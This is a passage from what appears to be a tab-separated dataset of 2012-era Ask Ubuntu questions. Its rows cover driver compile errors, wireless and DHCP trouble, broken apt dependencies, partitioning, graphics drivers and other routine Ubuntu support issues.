field ‘recv_tasklet’ has incomplete type in file included from /home/thinkpad20/downloads/rtl8712_8188_8191_8192su_usb_linux_v2.6.6.0.20120405/driver/rtl8712_8188_8191_8192su_usb_linux_v2.6.6.0.20120405/include/drv_types.h:73:0 , from /home/thinkpad20/downloads/rtl8712_8188_8191_8192su_usb_linux_v2.6.6.0.20120405/driver/rtl8712_8188_8191_8192su_usb_linux_v2.6.6.0.20120405/cmd/rtl871x_cmd.c:24 : /home/thinkpad20/downloads/rtl8712_8188_8191_8192su_usb_linux_v2.6.6.0.20120405/driver/rtl8712_8188_8191_8192su_usb_linux_v2.6.6.0.20120405/include/rtl871x_recv.h : in function ‘rxmem_to_recvframe’ : /home/thinkpad20/downloads/rtl8712_8188_8191_8192su_usb_linux_v2.6.6.0.20120405/driver/rtl8712_8188_8191_8192su_usb_linux_v2.6.6.0.20120405/include/rtl871x_recv.h:435:30 : warning : cast from pointer to integer of different size [ -wpointer-to-int-cast ] /home/thinkpad20/downloads/rtl8712_8188_8191_8192su_usb_linux_v2.6.6.0.20120405/driver/rtl8712_8188_8191_8192su_usb_linux_v2.6.6.0.20120405/include/rtl871x_recv.h:435:9 : warning : cast to pointer from integer of different size [ -wint-to-pointer-cast ] /home/thinkpad20/downloads/rtl8712_8188_8191_8192su_usb_linux_v2.6.6.0.20120405/driver/rtl8712_8188_8191_8192su_usb_linux_v2.6.6.0.20120405/cmd/rtl871x_cmd.c : in function ‘_init_cmd_priv’ : /home/thinkpad20/downloads/rtl8712_8188_8191_8192su_usb_linux_v2.6.6.0.20120405/driver/rtl8712_8188_8191_8192su_usb_linux_v2.6.6.0.20120405/cmd/rtl871x_cmd.c:93:75 : warning : cast from pointer to integer of different size [ -wpointer-to-int-cast ] /home/thinkpad20/downloads/rtl8712_8188_8191_8192su_usb_linux_v2.6.6.0.20120405/driver/rtl8712_8188_8191_8192su_usb_linux_v2.6.6.0.20120405/cmd/rtl871x_cmd.c:101:60 : warning : cast from pointer to integer of different size [ -wpointer-to-int-cast ] /home/thinkpad20/downloads/rtl8712_8188_8191_8192su_usb_linux_v2.6.6.0.20120405/driver/rtl8712_8188_8191_8192su_usb_linux_v2.6.6.0.20120405/cmd/rtl871x_cmd.c : in function ‘_init_evt_priv’ : /home/thinkpad20/downloads/rtl8712_8188_8191_8192su_usb_linux_v2.6.6.0.20120405/driver/rtl8712_8188_8191_8192su_usb_linux_v2.6.6.0.20120405/cmd/rtl871x_cmd.c:135:59 : warning : cast from pointer to integer of different size [ -wpointer-to-int-cast ] make [ 2 ] : *** [ /home/thinkpad20/downloads/rtl8712_8188_8191_8192su_usb_linux_v2.6.6.0.20120405/driver/rtl8712_8188_8191_8192su_usb_linux_v2.6.6.0.20120405/cmd/rtl871x_cmd.o ] error 1 make [ 1 ] : *** [ _module_/home/thinkpad20/downloads/rtl8712_8188_8191_8192su_usb_linux_v2.6.6.0.20120405/driver/rtl8712_8188_8191_8192su_usb_linux_v2.6.6.0.20120405 ] error 2 make [ 1 ] : leaving directory `/usr/src/linux-headers-3.2.0-23-generic' make : *** [ modules ] error 2 # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # compile make driver error : 2 please check error mesg # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # i 'm not a superuser , only a hobbyist . i really just want this to work ~.~ so i can get on with my life . sigh . anyway , grumbling aside , i hope people can help .
196990	unable to install ubuntu cloud setup on vmware	i guess this is trivial and most commonly asked question , but i 'd reiterate it again here as i 'm not able to find a correct solution . i 'm trying to install ubuntu cloud setup on vmware using the package from http : //download.ubuntu.com and have this basic installation setup issue as per the below image . file : ///cdrom/pool/main/k/klibc/klibc-utils_1.5.25-1ubuntu2_amd64.deb was corrupt the issue is i can not continue by skipping this as you know this happens to be the most important setup . how can i fix this ? help is sincerely appreciated .
196991	ca n't connect to the internet	i installed , today 10/05/12 , for the first time . i 've used windows for several years . well , it 's not as user friendly as some people claim . i decided to give it a try but it 's very upsetting that everything seems to be ok with my wireless connection , i 'm connected , and i just can not connect to the internet . when i open firefox i get the message `` server not found '' . help please ! i never had this problems with windows .
196998	how to clone root user in ubuntu ?	what is the procedure of cloning the root user in ubuntu ? how is root cloning useful ?
196999	can not get dhcp to work when connecting to an android ap	i am having a problem with my ubuntu 12.4 . basically , while i can connect fine with a `` normal '' wireless access point , i am having great difficulty connecting to anything else -- neither with my android phone withing as an ap ( stock android 4.0.4 kernel 3.0. and with a tiny telstra access point . i am actually in hospital looking after my wife who just had an emergency c section , so spending time tinkering with things is a little complicated -- help ! here is the log of what happens . from what i understand , authentication goes through but then the dhcp client fails to obtain an ip address . both the telstra ap and the android phone used to work . i tried using another computer , again with ubuntu 12.4 ( the one my wife is meant to use in hospital ! ) , but nothing . can somebody please help ? here is the log : http : //codepad.org/ppwfekcz this is what happens if i try to run dhclient manually while teh connection is being established ( so wlan1 is there ) ... $ sudo dhclient -v wlan1 internet systems consortium dhcp client 4.1-esv-r4 copyright 2004-2011 internet systems consortium . all rights reserved . for info , please visit https : //www.isc.org/software/dhcp/ listening on lpf/wlan1/e0:94:67:0a : a4:40 sending on lpf/wlan1/e0:94:67:0a : a4:40 sending on socket/fallback dhcpdiscover on wlan1 to 255.255.255.255 port 67 interval 3 dhcpdiscover on wlan1 to 255.255.255.255 port 67 interval 3 dhcpdiscover on wlan1 to 255.255.255.255 port 67 interval 3 dhcpdiscover on wlan1 to 255.255.255.255 port 67 interval 6 dhcpdiscover on wlan1 to 255.255.255.255 port 67 interval 9
197000	merge unallocated partitions	so my disk ended up being partitioned like this ( in order ) : system reserved ( 100mb ) windows 7 ( ntfs , 500gb ) ubuntu ( ext4 , 100gb ) swap ( 4gb ) unallocated space ( 400gb ) unfortunately , the unallocated space is not next to ext4 or ntfs partitions . i want to allocate 200gb to the windows 7 ntfs partition , the other 200gb to the ubuntu partitions . i think one can only merge partitions that are next to each other , not sure how to handle my case . any suggestions ? is there anything i should pay attention to ( such as not screwing up either windows or ubuntu system , not screwing up grub ) . i am using ubuntu 12.04 .
197001	is the 64-bit version of ubuntu only compatible with amd cpus ?	i was told that computers with more than 2 gig 's memory need a 64 bit operating system to utilize all ram . is the 64bit ubuntu download really just for amd processors ? i am asking because the disk image i downloaded says amd64 . so will my new intel 2.3ghz core i3 dual core processor work with 64 bit ubuntu ? it runs the 64bit version of windows without any qualm .
197010	how can i record my acoustic guitar on linux using ardour and rakarrak ?	i 'm running linux , and was recommended to use ardour and rakarrak for recording , but i have n't even gotten jackd to recognize my guitar . currently , the guitar is connected with a 1/4 '' to 1/8 '' cable directly from the pre-amp pickup in the guitar to the mic in on my computer . help !
197015	automatically open a file when another file is opened	in ubuntu , is it possible to cause one file to open whenever another file is opened ( using a shell script , perhaps ) ? for example , if i created a file called stuff.js , i 'd want the file stuff2.js to be launched whenever i opened stuff.js from the desktop .
197016	how to install a package that contains ubuntu kernel debug symbols ?	the default ubuntu kernel -generic package does n't seem to have symbols in it . i 'm trying to avoid compile a kernel with debug info manually . does ubuntu provide a package with kernel debug symbols ?
197018	how can i upgrade from ubuntu 12.4 to 12.10 ?	i want to upgrad from ubuntu 12.4 to 12.10 ? ? i tried from this suit http : //releases.ubuntu.com/12.10/ but it does n't work.. please help .
197019	attach one window to another window in ubuntu	in ubuntu , is it possible to attach one window to another window ( so that one window becomes the `` parent window '' of the other window ) ? i 'd like to know if it 's possible to do this for any two open windows ( for example , a firefox browser window and a gedit window ) .
197021	i need a list of linux-image names	i 've update to linux-image-3.2.0-30-generic-pae 3.2.0-30.48 and now ubuntu do n't open smoothly and take time to boot but it 's not that weird because i had this problem when i was using 11.10 all the time but some how when i upgrade to 12.10 it fixed , so now after i got like 3 new kernel images update the problem got to back again , what i 'm asking here is how to bring back the old linux-image to system and you must know i have remove all the old kernels with ubuntu tweak janitor option so now only one i got is linux-image-3.2.0-30-generic-pae 3.2.0-30.48 .
197030	'web apps ' keeps opening another session	i tried searching but could n't find this ( surprisingly ) . the new web apps ( 12.10 b2 ) itself it working fine in terms of integration to the messaging menu , etc ; but i 'm trying to figure out why chromium ( v20 ) keeps opening another instance in the unity launcher ( see below ) . even if there 's no chromium session running at all , i open it and it still does this . again , everything else works fine but it 's kind of ( visually ) annoying . any help would be appreciated . thanks in advance .
197032	how to block bypassing squid proxy ?	i am using 12.04 and have installed squid proxy to limit internet access . the proxy works fine normally , but users can bypass by using web-proxies like iphider etc . i tested it myself and it seems there 's no proxy at all . any solution , please ?
197033	getting `` try ubuntu '' option for netboot ubuntu	i 've been working the past few days to create a server computer that will allow me to boot a windows computer on its network into ubuntu , but without damaging any of the files on the windows client computer and without actually installing ubuntu on the that computer 's hard drive . that brought me to creating a pxe boot server using a dhcp server ( isc-dhcp-server package in ubuntu ) and a tftp server ( tftpd-hpa package ) together . with this , everything is working well and i can boot a windows computer on the network to the `` install '' screen for ubuntu . however , i used the `` netboot '' image of ubuntu that was available online , which uses pxelinux . in this image , the desktop ubuntu installer 's `` try ubuntu from this device ... '' option is not available , which means that from my pxe boot server i ca n't safely boot a computer into ubuntu without first installing ubuntu on the computer . is there a version of the `` netboot '' image that includes a `` try ubuntu from this '' that would copy ubuntu into the client 's ram without actually changing anything on their hard drive ? or , alternatively , is there a way to reconfigure my dhcp/tftp server setup so that it will serve the basic ubuntu livecd iso file that has the `` try ubuntu '' option ? ( i am new to linux as of this week , but eager to learn . the only time i had used it prior to now was for having an os to use on a computer with a corrupted copy of windows when i was in a pinch . so , i apologize for how much i do not know about all of this ! )
197036	how to know what dns am i using in ubuntu 12.04	we used to get current dns settings by : cat /etc/resolv.conf but ubuntu 12.04 has changed to use the resolvconf framework . the above commond will only give me this : # dynamic resolv.conf ( 5 ) file for glibc resolver ( 3 ) generated by resolvconf ( 8 ) # do not edit this file by hand -- your changes will be overwritten nameserver 127.0.0.1 and that is not the current dns settings of my machine . so , is there any kind of file or command i can refer to ?
197037	can not access windows share	i have an accounting program specifically tailored to the it industry , its called fincon ( exe based ) . it basically works on a client to server directory base system . the server is currently running on a windows 7 machine with a ntfs partition . i have installed wine . have the shared windows directory mounted with what i assume is the correct command for such being ( mount -tsmbfs //servername/sharedir /mnt/fincon -0 usename=username , password=password ) . i can see the shared dir although it does take a bit long to access it on the ubuntu machine via the mapped directory but instant via normal network browsing . i have also set up the mapped directory to my d : drive in wine and have pointed the fincon.ini to read server field from d : directly . here 's my issue , it seems that for some odd reason i cant write to the mapped directory from ubuntu , yet i can with my windows machines , the permissions are set correct on the windows 7 share and i really dunno what i 'm missing . i 'm quite a linux noob just switched yesterday . thanks guys for any help in this would be quite appreciated . as i 'm pulling out my hair here and really want to migrate my work pcs to a linux os as it just gives less issues than windows does ever .
197039	where is the startup file after blender upgrade to 2.64 ?	so , after the upgrade to blender 2.64 my preferences are lost and i have to set it up from the beginning but i do not want that . any ideas of where the blender config file is ?
197040	nvidia proprietary driver logging me to console instead of gui	firstly i want to apologise for any mistakes , english is not my native language . my problem is i ca n't get nvidia proprietary drivers to work . i tried to install it on ubuntu 12.04.1 32 and 64 bits , ubuntu 12.10 beta 2 , linux mint 13 cinnamon 64 bits and opensuse 12.2 64 bits and the error code and symptoms ( logging to tty1 instead of gui logging , low-res bootscreen ) are the same for all of these distros . right , i did n't tell what 's the error code . it appears on sudo startx . nvidia : could not open the device file /dev/nvidia0 ( input/output error ) . i know that 's the common problem , but i tried to blacklist or even remove the noveau drivers , install nvidia driver from repo/from official script/in `` additional drivers '' , editing xorg.conf and using xorg -configurate and nvidia-xconfig , actualizing the kernel and entire distro and many , many things that i do n't remember . but the problem is even better : entire cinnamon ( mint ) is freezing during the work . i found the error code , which appears during the freeze : oct 1 20:57:17 woozielaptop kernel : [ 308.120176 ] [ drm ] nouveau 0000:01:00.0 : pfifo_cache_error - ch 4/1 mthd 0z0060 data 0xbcef0201 my xorg.0.log is here . it was made on ubuntu 12.04.1 after installing nvidia drivers ( obviously ) . inxi -g from mint : graphics : card : nvidia gt216 [ geforce gt 240m ] x.org : 1.11.3 drivers : ( unloaded : nvidia ) failed : nouveau , vesa , fbdev tty size : 80x25 advanced data : n/a for root out of x lspci -k | grep -a2 vga from mint : 01:00.0 vga compatible controller : nvidia corporation gt216 [ geforce gt 240m ] ( rev a2 ) subsystem : lenovo device 38ff kernel driver in use : nvidia my hardware is : lenovo ideapad y550 intel c2d t6600 nvidia geforce gt 240m 4 gb of ram any help will be appreciated . this problem totally disabled my laptop from daily using . cheers , woozie
197043	what to do about `` system running in low-graphics mode '' ?	my dell which was 5 years old suddenly karked it and i had the `` low graphics '' black screen and useless dialogue box . as i believed it was a dead graphics card i went out and bought a brand new machine . i put aside the new machine and tried again in vain to open the dell . i eventually got to the command line via ctrl+alt+f1 . i logged into my account from there , and simply started a series of sudo apt-get remove of various softwares that i knew were installed on my pc ( software without any great consequence like google earth , tweak , skype etc ) . lo and behold after a sudo reboot my computer was fine again ! so now i have 2 computers . but one week after buying the other one and installing 12.04 because i love ubuntu , the same problem arrived ! i once again deleted google earth , skype , and did a sudo reboot and everything worked as before . i think there is a bug or something in 12.04 as this problem has never arisen with any other versions of ubuntu .
197044	unable to install monodevelop	cyborg @ cyborg : ~ $ sudo apt-get install monodevelop reading package lists ... done building dependency tree reading state information ... done some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : monodevelop : depends : libmetacity-private0 ( > = 1:2.26.0 ) but it is not going to be installed e : unable to correct problems , you have held broken packages .
197047	ubuntu software centre is gone ! how can i get it back ?	right . i am having major issues . ( it would be much appreciated if you would solve them for me ! check my profile for open questions ... ) following an answerer ... who sorry to say ... did n't give a great answer because it was just a graphical way of doing what i had already done - suggested i purge a library . turns out that library controlled the advanced packaging tool ( apt ) , ubuntu software centre and the repositories . not a great tool to mess with . while trying to purge the library , it came up with 'removing myunity.. removing x ... removing x ... removing ubuntu software centre ... removing x ... removing apt ... '' i quickly recognized and force shut-down my system . but i guess it was too late . so ... well , plainly put - how do i get it back ? !
197055	why are the packages found with apt-get always horribly out of date ?	whenever i use the package manager , it can only ever find really old versions of stuff . example : sudo apt-get update sudo apt-get install postgresql the best it can do is version 8.4 ( 3 years out of date ) . trying to get a later version , i get : $ sudo apt-get install postgresql-9.1 reading package lists ... done building dependency tree reading state information ... done e : could n't find package postgresql-9.1 i experience the same issue whenever i use the package manager , so i usually just download and build things from source . how can i make it find up-to-date software ?
197056	what does ^+z do to a process	in command line i wrote : michael @ ubuntu : ~ $ firefox firefox launched . command prompt ( $ ) disappeared . then i pressed ^+z . the result was : [ 1 ] + stopped firefox well , firefox really stopped . it did not react anyhow . so , i could not close it by pressing the cross of the window . by the way , the menu items 'tools ' , and 'help ' somehow showed some signs of life . they showed drop-down lists , but nothing more ( no reaction to inner menu items ) . well , i could not end firefox through system monitor . could you comment on this case : what happened after pressing ^+z ?
197060	sound stopped working on an hp probook 6550b	the sound on my hp probook 6550b stopped working a couple of days ago . i get sound via headphones just fine . i did run alsamixer and all bars are at 100 . i did check other posts but could n't find something that helped .
197061	vlc package dependencies broken & can not be resolved	i 'm using ubuntu 12.04 32bit . today , suddenly some updates had arrived but it was n't normal update . it said me to partial update . when i have done this , update manager want to remove vlc . i did it . but when i want to install vlc from synaptic package manager , i found broken dependencies there . now , if i want to install vlc from software centre , it pops up : the following packages have unmet dependencies : vlc : depends : fonts-freefont-ttf but it is not going to be installed depends : vlc-nox ( = 2.0.3+git20121005+r392-0~r42~precise1 ) but 2.0.3+git20121005+r392-0~r42~precise1 is to be installed depends : libavcodec-extra-53 ( > = 4:0.8-1~ ) but 4:0.8.3ubuntu0.12.04.1 is to be installed depends : libavutil-extra-51 ( > = 4:0.8-1~ ) but 4:0.8.3ubuntu0.12.04.1 is to be installed depends : libc6 ( > = 2.15 ) but 2.15-0ubuntu10.2 is to be installed depends : libfreetype6 ( > = 2.2.1 ) but 2.4.8-1ubuntu2 is to be installed depends : libgcc1 ( > = 1:4.1.1 ) but 1:4.6.3-1ubuntu5 is to be installed depends : libqtcore4 ( > = 4:4.8.0 ) but 4:4.8.2+dfsg-2ubuntu1~precise1~ppa1 is to be installed depends : libqtgui4 ( > = 4:4.7.0~beta1 ) but 4:4.8.2+dfsg-2ubuntu1~precise1~ppa1 is to be installed depends : libstdc++6 ( > = 4.6 ) but 4.6.3-1ubuntu5 is to be installed depends : zlib1g ( > = 1:1.2.3.3.dfsg ) but 1:1.2.3.4.dfsg-3ubuntu4 is to be installed hey , now what to do ? how to resolve this problem ?
197070	ubuntu server 12.04 , nat , router , dns . it just doesnt work	i recently inherited some server hardware from work and decided that it could be my main router at home ( among other things ) . ubuntu 12.04 server installation harware wise goes well and everything is found and working when i boot up . so i begin with setting up eth1 with dhcp . this works fine and it gets a public ip address from my modem and we have a working internet connection . then i set up my other nic ( eth0 ) as static ( 192.168.0.1 ) and this also works fine . i can access it from other computers in the network . the problems are coming when i am trying to set up a dhcp server with isc-dhcp-server . it seems like it is working and giving the computers ip adresses but after one reboot it stops working . after the reboot eth1 will get a public ip from the modem but it doesnt have internet access . i have to manually run dhcpcd eth1 to get it to work again . as far as i know i havent made any changes to dns . what am i doing wrong ? i have never really had problems with this before . : )
197074	how to create folders structure in shotwell	trying to sort my photo folder using shotwell , aside shotwell is good almost for everything ... the events organization is just ridiculous . i have number of photos taken across the various location on various dates and i do n't care about dates . i want it simple to reproduce my folder tree . i do n't wan na use tags as tags are needed for diversification of the photo compilation . it would be ideal to have shotwell organizing folder similar to picasa folder tree . or at least possibilty to rename events ( years and months ) and easily move photos between events . tried various photo organizers such as gthumb , digikam , gwenwiew , darktable etc and all lack of stability or decent organizing possibilities . so far shotwell looks best but events organizing is just plain bad if you somehow work with photography . the tree should have main folders then sub folders . i 'm quite surprised about lack of options in photo organizers and that keeps me from completely removing win from my pc 's . any suggestions ?
197075	ubuntu 12.04 no desktop , only terminal	i installed cinnamon and uninstall unity using a terminal command i found on the web , but i skipped some steps on removing unity thinking it was not important . now , when i turn on my laptop it will only boot to terminal , it does n't go to to log in screen to log in to cinnamon desktop or gnome classic . how can i fix this ?
197076	how fix wireless problem on ubuntu 12.04 ? dell vostro 3750	i have install ubuntu 12.04 on my machine and i have problem with wireless . on system settings > web , i can not switch it on . i have tried : sudo apt-get remove bcmwl-kernel-source sudo apt-get install bcmwl-kernel-source but it does't work for me . i have had ubuntu 11.04 before and there wifi works fine . any help would be appreciated .
197078	prevent duplicate wireless authentication windows	first i need to specify that this is not a duplicate of this : how do i turn off wireless connection notifications ? neither is this a duplicate of this : how to disable notification from network-manager what i am asking has to do with ubuntu 12.04 lts and not the notifications but this program i think it is apport but not sure that is responsible for the `` wireless authentication required '' windows shown below : please tell me how i can turn these off . when i go to sleep and leave wireless on , i get hundreds of these . hundreds ! ! ! and then i have to close each one individually which takes sometimes several minutes of clicking through them . sometimes my computer wont even wake from sleep due to the amount of ram consumed by the hundreds of these windows . i often forget to turn my wireless off before i sleep . i try to do it and that will negate this problem but i should n't have to make a conscious decision to do that every time . i want to leave my wireless on and i do n't want to get these windows . at the very least , you only need to get one window asking for a password from one network right ? but i get hundreds of these windows asking for a password for the same networks ! ! ! ! ! help ! specifically i would like to fix this problem while allowing me to leave my wireless connection on while i sleep and not have to put my computer into hibernation .
197079	hard disk not visible on dual boot system after reinstalling grub	my hard disk is not visible to me , i am using 12.04 with parallel windows xp . first i install 12.04 then i installed windows xp . ubuntu grub menu is hidden . i then repaired ubuntu . on that time hard disk is not visible to me . please help .
197083	why does ubuntu 12.04 have more stringent complexity requirements , and how to to remove them ?	i was wondering why the developers of ubuntu made stricter conditions for user passwords than before ? my password has to contain letters and numbers , has to be minimum this length , maximum that length . it 's quite annoying . and is there any way to bypass these requirements and set my user password to something easy such as 'foobar ' ? i 'm sorry if this question was already answered but i could n't find a specific solution . thank you in advance .
197085	is there a messenger service implementing something like windows 's `` net send '' ?	in the microsoft universe you can do funny things with the net send command . according to this i have two questions regarding the ubuntu side of things : is there a similar service for sending messages between linux systems ? is there a service that allows you to send messages from within linux to a windows pc implementing the net send protocol ?
197086	where should i be looking/learning about the changes between ubuntu ( server ) editions ?	i maintain a few ubuntu servers and it works great ... but , i now have notifications on a few that state there is a new release available and i should run do-release-upgrade . since these servers were initially provisioned , i have create a few extra ones that are on the newest version , and , i have noticed quite a few differences . for example , perhaps i was doing it incorrectly , but , i used to set dns servers manually in /etc/resolv.conf , but , on the latest version , that file is created/modified automatically and overwritten ( and i am still not 100 % sure where from ) . ( skip to here if you do n't want the back story ! ) before i deploy a new version , i really need to know almost every difference and make sure it does n't break anything ... is there any ( official ) place to look at that can tell me critical or important differences between the versions ? are the release notes the only place , or , are there better guides anywhere ?
197087	most basic input devices : what can we use other than a keyboard to make selections in the bios and during installation ?	i wonder if there is anything else that might conceivably be used to input commands . i am sure there must be some imaginative possibilities !
197092	how do i install ubuntu using a cd	i have recently burned ubuntu to a cd using the instructions on the downloads website , i made sure that it had burned properly and not just the .iso file ( so i could see all the right files , and not just the .iso file ) i put in the disc and the os launched . on the desktop , i clicked the 'install ubuntu ' and a window popped up . i selected english and the window dissapeared after i clicked 'ok ' . did it install or did i do something wrong ? thanks in advance , james easton
197095	how to add greek polytonic with setxkbmap	i want to add greek polytonic keyboard layout under lububtu ( so in lxde ) . i already realized there is no easy tool to do it with the graphic interface , so i need to use setxkbmap executing something the like of : setxkbmap pl , gr now , how to make setxkbmap set the greek polytonic variant ?
197099	zenity window on top	i would like the window produced by zenity to be configured so it is always on top . there does not appear to be an option to enable this . can someone suggest a source change to the zenity code so that i can get this to work ? i want to be able to do zenity -- ontop `` warning '' if there is an alternative which does not involve writing code , i would be interested in this too .
197109	what happens to remounted data/directories	according to suggestions in this post i am trying to improve my system to run better with a solid state drive . but regarding to ramdisks and /etc/fstab usage i have some understanding problems coming up . so let 's say i add the following lines to /etc/fstab tmpfs /tmp tmpfs defaults , noatime , nodiratime , mode=1777 0 0 tmpfs /var/spool tmpfs defaults , noatime , nodiratime , mode=1777 0 0 tmpfs /var/tmp tmpfs defaults , noatime , nodiratime , mode=1777 0 0 tmpfs /var/log tmpfs defaults , noatime , nodiratime , mode=0755 0 0 i know that on startup these locations should now get mounted into the ram ( hopefully ) . but what happens to the physical space that was mounted on those places before ? is it gone ? will it be back when i edit my /etc/fstab back to the version without tmpfs ? will the space still be allocated on my ssd in a way that i ca n't use it for any other data ? sometimes it is suggested to add the following line , too : none /var/cache aufs dirs=/tmp : /var/cache=ro 0 0 what does this actually do ? i noticed that /var/cache takes almost 1gb of space on my harddisk . so should i clear the directory before activating this line ? ( this is related to the former question ) this causes me some confusions and i hope you can give me some clarifications . update i 've downloaded a image with 600mb in size into /tmp that is mounted with the tmpfs settings above . now i wanted to compare the ram usage before and after the download . i expect the ram usage to be increased by 600mb after the download . but the system monitoring tool showed me no changes at all . how can this be ? does tmpfs work other than i actually expect it to ?
197110	enable drivers on lubuntu ?	i installed the b43 legacy drivers under the command-line using : apt-get install firmware-b43legacy-installer how do i enable the driver in lubuntu ? ubuntu has system - > administration - > hardware/additional drivers . where is the lubuntu equivalent of this ?
197113	can not get gigabit connection with bcm57780 and tg3.ko	i 've got a broadcom bcm57780 netlink ethernet adapter in a laptop and i can not get it to achieve a 1000mbps connection . i have already verified that the cables are good -- other systems work fine using the same cables and switch . i have tried both with and without networkmanager managing the connection . i have tried to use ethtool -r to force renegotiation with and without tso enabled . in all cases , the bcm57780 always connects at 100mbps/fullduplex . i have also tried the stock 3.2 kernel as well as the xorg-edgers ' 3.5 and the mainline 3.6 . none works at gigabit speed . # dmesg | grep tg3 [ 0.000000 ] command line : boot_image=/vmlinuz-3.6.0-999-generic root=uuid=eccabacd-efb2-45b4-b7a6-2f530d50afd3 ro rootflags=subvol= @ tg3_debug=1 i915_enable_rc6=7 i915_enable_fbc=1 lvds_downclock=1 [ 0.000000 ] kernel command line : boot_image=/vmlinuz-3.6.0-999-generic root=uuid=eccabacd-efb2-45b4-b7a6-2f530d50afd3 ro rootflags=subvol= @ tg3_debug=1 i915_enable_rc6=7 i915_enable_fbc=1 lvds_downclock=1 [ 6.239945 ] tg3.c : v3.125 ( september 26 , 2012 ) [ 6.262748 ] libphy : tg3 mdio bus : probed [ 6.273209 ] tg3 0000:01:00.0 eth0 : tigon3 [ partno ( bcm57780 ) rev 57780001 ] ( pci express ) mac address dc:0e : a1 : ac:38 : d5 [ 6.273220 ] tg3 0000:01:00.0 eth0 : attached phy driver [ broadcom bcm57780 ] ( mii_bus : phy_addr=100:01 ) [ 6.273227 ] tg3 0000:01:00.0 eth0 : rxcsums [ 1 ] linkchgreg [ 0 ] miirq [ 0 ] asf [ 0 ] tsocap [ 1 ] [ 6.273233 ] tg3 0000:01:00.0 eth0 : dma_rwctrl [ 76180000 ] dma_mask [ 64-bit ] [ 1222.710339 ] tg3 0000:01:00.0 : irq 44 for msi/msi-x [ 1223.045554 ] tg3 0000:01:00.0 eth0 : link is down [ 1237.040178 ] tg3 0000:01:00.0 eth0 : link is up at 100 mbps , full duplex [ 1237.040187 ] tg3 0000:01:00.0 eth0 : flow control is on for tx and on for rx googling has shown that for a number of non-ubuntu distros , it may be necessary to load the broadcom.ko module before the tg3.ko module https : //wiki.archlinux.org/index.php/bcm57780 . with the above mentioned kernels , however , there is no broadcom.ko module . wtf might be necessary to restore gigabit capability to this nic ?
197116	what to do about this gnome-keyring message ?	i upgraded from ubuntu 10.04 to 12.04 and installed lxde . since then whenever i try to print some file ( or use command lpstat ) , i get this message on the terminal : '' warning : gnome-keyring : : could n't connect to : /tmp/keyring-sz59jj/pkcs11 : no such file or directory '' . this is beyond my knowledge and from search i only realize that this may be related to security ( as learned from gnome keyring on wikipedia ) . i have no idea what to do about this warning . can anybody please suggest ? evidently as stated , i am not using gnome desktop , i choose lxde session at the time of logging in .
197117	how to download specific ubuntu drivers for my pc	i am using hp compaq presario sg3650il desktop pc . i am new to linux so all i want to know that how to download specific drivers for my pc .
197120	installing multi-boot linux system	i have a dual ( xp/linux ) boot compaq presario s4500uk with a couple of spare partitions on the boot drive which i want to use for testing different linux distros/configs before installing them on `` live '' machines . i tried this with oneiric which worked fine until i came to un-installing the test system . fortunately oneiric uses grub2 and so redirecting the boot-loader to work from the original linux partition was a piece of cake - if a bit annoying . i now need to do some tests on hardy and dsl ( damned small linux ) , neither of which use grub2 . question : is it possible to install a test operating system without adding/replacing the boot-loader ( i.e . so i can still use grub2 from the original partition with its nice interface and recovery facilities ) ? is there another way of uninstalling/decommisioning a test os which does n't trash the boot loader ? ( the only way i know to do this is by deleting/reformatting the partition which takes with it the boot-loader which is in that partition ) ? any help would be much appreciated .
197121	ubuntu system updates	i am currently running ubuntu 12.04 lts but i am wondering how can you update from 12.04 to 12.10 ? do you need to download the cd or you can simply update it from the update manager ? thanks in advance !
197122	how can i get pictures from shotwell on the notebook to the desktop ?	my father has a desktop and a notebook . the desktop is way more powerful and has raid set up , so he uses it for editing and storing his pictures . but he spends several months a year away from home . so he has a notebook for this . he imports the pictures into shotwell on his computer . he likes to organise his pictures on the notebook already , by creating and naming the right events , deleting pictures and sometimes editing a bit . when he is back home , he wants to get his pictures on the desktop , without losing the names of the events in shotwell . sadly , one can not merge two shotwell databases , nor is it possible to import another database . do you know any way , i can manage this ? or did i just miss something ?
197127	language support problem	i have a problem with the language support in ubuntu 12.04lts . i want to install spanish in my computer and the system is n't able to find or create the directory that will allow the system to actually set spanish as a language option inside language support . so i am wondering how can i tell the system where are those files or how to fix this in any other way . thanks a lot !
197128	how to make an ubuntu server system accessible over the internet ?	i just installed ubuntu server 12.04 on my office pc with : open ssh dns lamp i also have following installed and configured : webmin phpmyadmin proftp i have set my ip to static in interfaces by editing it . now i want to access my office pc from home but for that i guess i have to make it a live server which i do not know how to do that . please help me with this .
197129	getting windows games to play on playonlinux	i used play on linux and starcraft ii as a test to see if i can play my library of games on linux ... i 'm having a bunch of problems.. just when it looks like it i 'll work i get another runtime c library error , and it stops ... is there something i can just press and something fix this for me ?
197131	use mobile broadband usb as wireless adapter usb - huawei e173	i have an mobile broadband usb ( huawei e173 ) , which can also work as a wifi adapter usb . the problem is that ubuntu 12.04 only recognizes it as an mobile broadband usb , not as an wireless adapter usb , is there a way to `` trick '' ubuntu to recognize my usb as a wireless adapter ? thanks in advance . notes : i used the lsusb command and got this : `bus 002 device 009 : id 12d1:1c23 huawei technologies co. , ltd.` i have 64-bit ubuntu installed , so it may just be a driver problem .
197132	apt-get saying `` unable to correct problems , you have held broken packages . ''	tl ; dr : sudo apt-get install ... saying `` unable to correct problems , you have held broken packages . '' the problem i was trying to get the webapps feature for pp and qq following this blog post . i ran the sudo add-apt-repository ppa : webapps/preview command to add the repository , but i got a connection error . since i know my current isp gives a shaky connection , i tried again and sure enough , it worked . then i ran sudo apt-get install unity-webapps-preview , but i realized we had to update apt-get first , so i hit ctrl + c to stop it . then i ran sudo apt-get update which worked w/o a fuss , but when i ran sudo apt-get install unity-webapps-preview again later , it showed an error message . here 's the dump : reading package lists ... done building dependency tree reading state information ... done some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : unity-webapps-preview : depends : xul-ext-unity but it is not going to be installed depends : xul-ext-websites-integration but it is not going to be installed depends : xul-ext-webaccounts but it is not going to be installed e : unable to correct problems , you have held broken packages . i think this might be because of me interrupting the earlier command . it had n't got a chance to output anything , though â i stopped it pretty fast . what i tried commands i tried these : - sudo apt-get install -- fix-broken sudo apt-get autoclean sudo apt-get autoremove sudo apt-get -f install but even after running sudo apt-get upgrade after every try , none of them 